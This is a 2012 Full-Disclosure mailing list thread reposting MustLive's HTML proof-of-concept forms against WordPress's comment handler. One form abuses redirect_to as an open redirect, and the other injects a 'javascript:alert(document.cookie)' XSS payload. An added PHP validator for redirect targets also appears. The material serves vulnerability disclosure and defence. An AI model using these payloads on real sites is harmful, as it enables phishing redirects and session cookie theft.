Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
- From: InterN0T Advisories <advisories@xxxxxxxxxxxx>
- Date: Sat, 05 May 2012 09:54:02 -0400
Hi List,
To stop MustLive's desperate act of trying to get visitors (and more
backlinks) to his website, I have, for those that don't want to go there
just to see the PoCs but would rather read them on this mailing list like
almost _every other_ Proof of Concept / exploit, made them available
below.
Contents of Wordpress Redirector:
<html>
<head>
<title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@xxxxxxxxx" />
<input type="hidden" name="comment" value="Test" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to" value="http://awebsite.tld" />
</form>
</body>
</html>
--------------------------------------
Contents of Wordpress XSS:
<html>
<head>
<title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@xxxxxxxxx" />
<input type="hidden" name="comment" value="Test21" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to"
value="javascript:alert%28document.cookie%29//" />
</form>
</body>
</html>
--------------------------------------
I don't really have any comments about these "exploits".
Best regards,
Nemesis 3.0
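The two PoCs above differ only in the value of the redirect_to field: an absolute URL to another site, and a percent-encoded javascript: URI that becomes a script URL once the server decodes it into a Location or Refresh header. The defensive fix is the same for both, so as an added example (not WordPress code, and not part of either message) here is a standalone PHP validator that treats the redirect target as untrusted and only lets through site-relative paths or absolute URLs whose scheme is http/https and whose host is on an allow-list. The host name "site" is taken from the PoC forms; the function name, the allow-list and the remaining test values are constructed for illustration. WordPress's own wp_safe_redirect() applies a comparable host allow-list, which is the fix a site operator would normally reach for.

```php
<?php
// Added example, not WordPress core code: validate a post-comment redirect
// target (the "redirect_to" value in the PoCs above) before emitting a
// Location/Refresh header. Function name and allow-list are assumptions.

/**
 * Return $candidate if it is a safe same-site redirect target, else $fallback.
 *
 * @param string   $candidate     raw value from the request (may be %-encoded)
 * @param string[] $allowed_hosts lower-case host names the site owns
 */
function safe_redirect_target(string $candidate, array $allowed_hosts, string $fallback = '/'): string
{
    // Browsers act on the decoded value once it lands in a header, so the
    // check has to run on the decoded form ("%28" -> "(" etc.).
    $url = rawurldecode($candidate);

    // Drop ASCII control characters and whitespace: browsers ignore them
    // when parsing a scheme, so "java\tscript:" would still run.
    $url = preg_replace('/[\x00-\x20\x7F]+/', '', $url);
    if ($url === null || $url === '') {
        return $fallback;
    }

    // Some browsers treat "\" like "/", so normalise before the "//" check.
    $url = str_replace('\\', '/', $url);

    // Scheme-relative URLs ("//other.tld/...") leave the site: reject.
    if (strpos($url, '//') === 0) {
        return $fallback;
    }

    // A site-relative path carries neither scheme nor host: safe as-is.
    if ($url[0] === '/') {
        return $url;
    }

    $parts = parse_url($url);
    // "javascript:alert(...)" and "data:..." parse to a scheme with no host;
    // unparseable input is rejected for the same reason.
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return $fallback;
    }

    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return $fallback;   // javascript:, data:, vbscript:, ...
    }

    // parse_url() puts "user@" in 'user', so "http://site@other.tld/" is
    // seen with host "other.tld" and rejected here.
    $host = strtolower($parts['host']);
    if (!in_array($host, $allowed_hosts, true)) {
        return $fallback;   // open-redirect attempt to a foreign host
    }

    return $url;
}

// Demo: the site's own host is the "site" placeholder used in the PoC forms.
$allowed = ['site'];
$cases = [
    'http://awebsite.tld',                     // value from the Redirector PoC
    'javascript:alert%28document.cookie%29//', // value from the XSS PoC
    '//other.tld/',                            // constructed: scheme-relative
    'http://site/?p=1#comment-7',              // constructed: same-site absolute
    '/?p=1#comment-7',                         // constructed: site-relative
];
foreach ($cases as $c) {
    printf("%-42s => %s\n", $c, safe_redirect_target($c, $allowed, '/'));
}
```

Run with the PHP CLI; the two values lifted from the PoCs and the scheme-relative case collapse to the fallback "/", while the two same-site targets pass through unchanged. The order of the steps matters: decoding and control-character stripping come first so that the scheme check sees what a browser would see, and the backslash normalisation precedes the "//" test so that "/\other.tld" cannot slip past as a site-relative path.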
On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> wrote:
> Hello list!
>
> I want to warn you about security vulnerabilities in WordPress.
>
> These are Insufficient Anti-automation, Redirector and Cross-Site Scripting
> vulnerabilities.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are WordPress 2.0 - 3.3.1.
>
> ----------
> Details:
> ----------
>
> Already from WP 2.0 there are Insufficient Anti-automation, Redirector and
> XSS vulnerabilities in wp-comments-post.php. I first faced the IAA when I
> began using WP in 2006. While the developers fixed the vulnerabilities in
> the previous two redirectors in WP 2.3, these vulnerabilities were not fixed
> even in WP 3.3.1.
>
> IAA (WASC-21):
>
> The lack of a captcha in the comment form allows automated attacks to be
> conducted. The developers still haven't put a captcha in the WP comment
> form (since the first version of the engine), which besides IAA attacks
> also allowed Redirector and XSS attacks to be conducted.
>
> By default in WordPress premoderation is turned on, and there is also a
> built-in anti-spam filter. But if 10 years ago premoderation would have
> been enough, this mechanism has long since ceased to be considered
> sufficient protection against spam, and the anti-spam filter had an
> efficiency of less than 1%: it marked only a few of the spam messages as
> spam. These mechanisms also don't protect against the below-mentioned
> attacks. The Akismet plugin is also bundled with WP, which is
> "captcha-less" protection against spam. But by default it's turned off,
> and compared with captcha it's considered less efficient and also doesn't
> protect against the below-mentioned attacks.
>
> Redirector (URL Redirector Abuse) (WASC-38):
>
> Exploit:
>
> [Removed]
>
> XSS (WASC-08):
>
> Exploit:
>
> [Removed]
>
> The XSS attack is possible in different browsers, but it's harder to
> conduct than in the case of the previous two redirectors (via data URI).
> On IIS web servers the redirect goes via the Refresh header, and on other
> web servers via the Location header.
>
> Due to nuances of how this script works (filtering of important symbols
> and adding of an anchor), executing JS code requires tricky bypass
> methods. This complexity exists both with the javascript URI and with the
> combo variant javascript URI + data URI.
>
> A reliable captcha protects against IAA, Redirector and XSS
> vulnerabilities.
>
> ------------
> Timeline:
> ------------
>
> 2012.04.26 - disclosed at my site
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/